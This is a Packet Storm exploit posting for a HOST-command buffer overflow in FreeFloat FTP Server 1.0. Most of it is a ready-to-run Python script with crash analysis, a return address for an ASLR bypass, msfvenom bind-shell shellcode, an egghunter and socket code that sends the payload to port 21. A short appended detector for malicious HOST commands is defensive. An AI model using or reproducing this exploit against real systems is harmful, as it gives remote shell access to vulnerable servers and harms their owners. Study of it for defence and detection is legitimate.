FreeFloat FTP Server 1.0 HOST Buffer Overflow

Posted Nov 6, 2017
Authored by 1N3

FreeFloat FTP Server version 1.0 HOST buffer overflow exploit with ASLR bypass.

tags | exploit, overflow
SHA-256 | 87bd79a5a3aaf3db3a9c08a2705273f1b0d9a1babc34e142e265648150d6db47

#!/usr/bin/python
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)
# CVE : N/A

import socket, time

# CONNECT TO HOST
host = "10.0.0.39"
port = 21

# [*] Exact match at offset 246
#buffer = "HOST " + "\x41" * 246 + "\x42" * 4 + "\x43" * 745 + '\r\n'

# AFTER CRASH
#EAX 00000408
#ECX 001FC700
#EDX 77C45E74 ntdll.KiFastSystemCallRet
#EBX 0000001A
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EBP 016D13F0
#ESI 0040A29E FTPServer.0040A29E
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EIP 42424242

# !mona suggest
# 0BADF00D [+] Examining registers
# 0BADF00D EIP contains normal pattern : 0x41326941 (offset 246)
# 0BADF00D ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)
# 0BADF00D EDI (0x01741d24) points at offset 727 in normal pattern (length 273)

# CALL EDI - msvcrt.dll
#Found commands (All modules), item 5241
# Address=77D918F6
# Disassembly=CALL EDI
# Module Name=C:\Windows\system32\msvcrt.dll

# BIND SHELL
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "\x0a\x00\x0d"
# Payload size: 355 bytes + 4 byte egg = 359 bytes
# Final size of python file: 1710 bytes
bind_shell = "T00WT00W"
bind_shell += "\xdd\xc2\xbf\x9a\xa8\x28\x21\xd9\x74\x24\xf4\x5d\x33"
bind_shell += "\xc9\xb1\x53\x31\x7d\x17\x83\xc5\x04\x03\xe7\xbb\xca"
bind_shell += "\xd4\xeb\x54\x88\x17\x13\xa5\xed\x9e\xf6\x94\x2d\xc4"
bind_shell += "\x73\x86\x9d\x8e\xd1\x2b\x55\xc2\xc1\xb8\x1b\xcb\xe6"
bind_shell += "\x09\x91\x2d\xc9\x8a\x8a\x0e\x48\x09\xd1\x42\xaa\x30"
bind_shell += "\x1a\x97\xab\x75\x47\x5a\xf9\x2e\x03\xc9\xed\x5b\x59"
bind_shell += "\xd2\x86\x10\x4f\x52\x7b\xe0\x6e\x73\x2a\x7a\x29\x53"
bind_shell += "\xcd\xaf\x41\xda\xd5\xac\x6c\x94\x6e\x06\x1a\x27\xa6"
bind_shell += "\x56\xe3\x84\x87\x56\x16\xd4\xc0\x51\xc9\xa3\x38\xa2"
bind_shell += "\x74\xb4\xff\xd8\xa2\x31\x1b\x7a\x20\xe1\xc7\x7a\xe5"
bind_shell += "\x74\x8c\x71\x42\xf2\xca\x95\x55\xd7\x61\xa1\xde\xd6"
bind_shell += "\xa5\x23\xa4\xfc\x61\x6f\x7e\x9c\x30\xd5\xd1\xa1\x22"
bind_shell += "\xb6\x8e\x07\x29\x5b\xda\x35\x70\x34\x2f\x74\x8a\xc4"
bind_shell += "\x27\x0f\xf9\xf6\xe8\xbb\x95\xba\x61\x62\x62\xbc\x5b"
bind_shell += "\xd2\xfc\x43\x64\x23\xd5\x87\x30\x73\x4d\x21\x39\x18"
bind_shell += "\x8d\xce\xec\xb5\x85\x69\x5f\xa8\x68\xc9\x0f\x6c\xc2"
bind_shell += "\xa2\x45\x63\x3d\xd2\x65\xa9\x56\x7b\x98\x52\x49\x20"
bind_shell += "\x15\xb4\x03\xc8\x73\x6e\xbb\x2a\xa0\xa7\x5c\x54\x82"
bind_shell += "\x9f\xca\x1d\xc4\x18\xf5\x9d\xc2\x0e\x61\x16\x01\x8b"
bind_shell += "\x90\x29\x0c\xbb\xc5\xbe\xda\x2a\xa4\x5f\xda\x66\x5e"
bind_shell += "\xc3\x49\xed\x9e\x8a\x71\xba\xc9\xdb\x44\xb3\x9f\xf1"
bind_shell += "\xff\x6d\xbd\x0b\x99\x56\x05\xd0\x5a\x58\x84\x95\xe7"
bind_shell += "\x7e\x96\x63\xe7\x3a\xc2\x3b\xbe\x94\xbc\xfd\x68\x57"
bind_shell += "\x16\x54\xc6\x31\xfe\x21\x24\x82\x78\x2e\x61\x74\x64"
bind_shell += "\x9f\xdc\xc1\x9b\x10\x89\xc5\xe4\x4c\x29\x29\x3f\xd5"
bind_shell += "\x59\x60\x1d\x7c\xf2\x2d\xf4\x3c\x9f\xcd\x23\x02\xa6"
bind_shell += "\x4d\xc1\xfb\x5d\x4d\xa0\xfe\x1a\xc9\x59\x73\x32\xbc"
bind_shell += "\x5d\x20\x33\x95"

# 32 BYTE EGGHUNTER
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# CALL EDI - msvcrt.dll
eip = "\xF6\x18\xD9\x77"

buffer = "HOST " + "\x41" * 246 + eip + "\x90" * 10 + bind_shell + "\x90" * 241 + egghunter + '\r\n'

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    print sock.recv(1024)          # read the FTP banner before sending anything
    sock.settimeout(10)

    print "Sending buffer..."
    print str(buffer)
    sock.send(buffer)              # connected TCP stream socket: send(), not sendto()
    print "Sent!"
    sock.close()

except socket.error as e:
    print "socket connection failed: %s" % e

time.sleep(1)

print "Done!"
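As an added defender-side example, not part of 1N3's exploit, the following Python 3 check parses an FTP control-channel byte stream and flags HOST commands shaped like the overflow above: an argument long enough to reach the 246-byte return-address offset the crash analysis reports, or one carrying non-printable bytes and 0x90 NOP runs where only a hostname belongs. The thresholds are taken from the exploit's own notes; the sample session is constructed.

```python
# Added defender-side check, not part of the original exploit. Thresholds come from
# the exploit's own crash notes (return address overwritten at offset 246 of the
# HOST argument; payload is raw shellcode padded with 0x90 NOPs). Samples are constructed.
import re

HOST_OVERFLOW_OFFSET = 246  # "Exact match at offset 246" in the crash analysis above
NOP_RUN = b"\x90" * 8       # a run of x86 NOPs never belongs in a hostname


def parse_ftp_commands(stream):
    """Split a raw FTP control-channel byte stream into (VERB, argument) pairs."""
    cmds = []
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(b" ")
        cmds.append((verb.upper(), arg))
    return cmds

def classify_host(arg):
    """Return the reasons a HOST argument looks like the overflow, or [] if it is clean."""
    reasons = []
    if len(arg) >= HOST_OVERFLOW_OFFSET:
        reasons.append("argument length %d reaches return-address offset %d"
                       % (len(arg), HOST_OVERFLOW_OFFSET))
    if re.search(rb"[^\x20-\x7e]", arg):
        reasons.append("non-printable bytes in a hostname field (raw payload)")
    if NOP_RUN in arg:
        reasons.append("run of 0x90 NOPs (sled)")
    return reasons

def scan_stream(stream):
    """Return one (command_index, reasons) finding per suspicious HOST command."""
    findings = []
    for i, (verb, arg) in enumerate(parse_ftp_commands(stream)):
        if verb == b"HOST":
            reasons = classify_host(arg)
            if reasons:
                findings.append((i, reasons))
    return findings

# Constructed samples: a benign session, then two HOST lines shaped like the overflow.
BENIGN = b"HOST ftp.example.com\r\nUSER anonymous\r\nPASS guest\r\n"
OVERSIZED = b"HOST " + b"A" * 300 + b"\r\n"
BINARY = b"HOST ftp.example.com" + b"\x90" * 16 + b"\r\n"

if __name__ == "__main__":
    for idx, why in scan_stream(BENIGN + OVERSIZED + BINARY):
        print("command #%d: %s" % (idx, "; ".join(why)))
```

The same check can be run over reassembled TCP payloads from a capture or inside an FTP-aware proxy; a legitimate HOST argument is a hostname well under 246 printable bytes.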
packet storm

© 2022 Packet Storm. All rights reserved.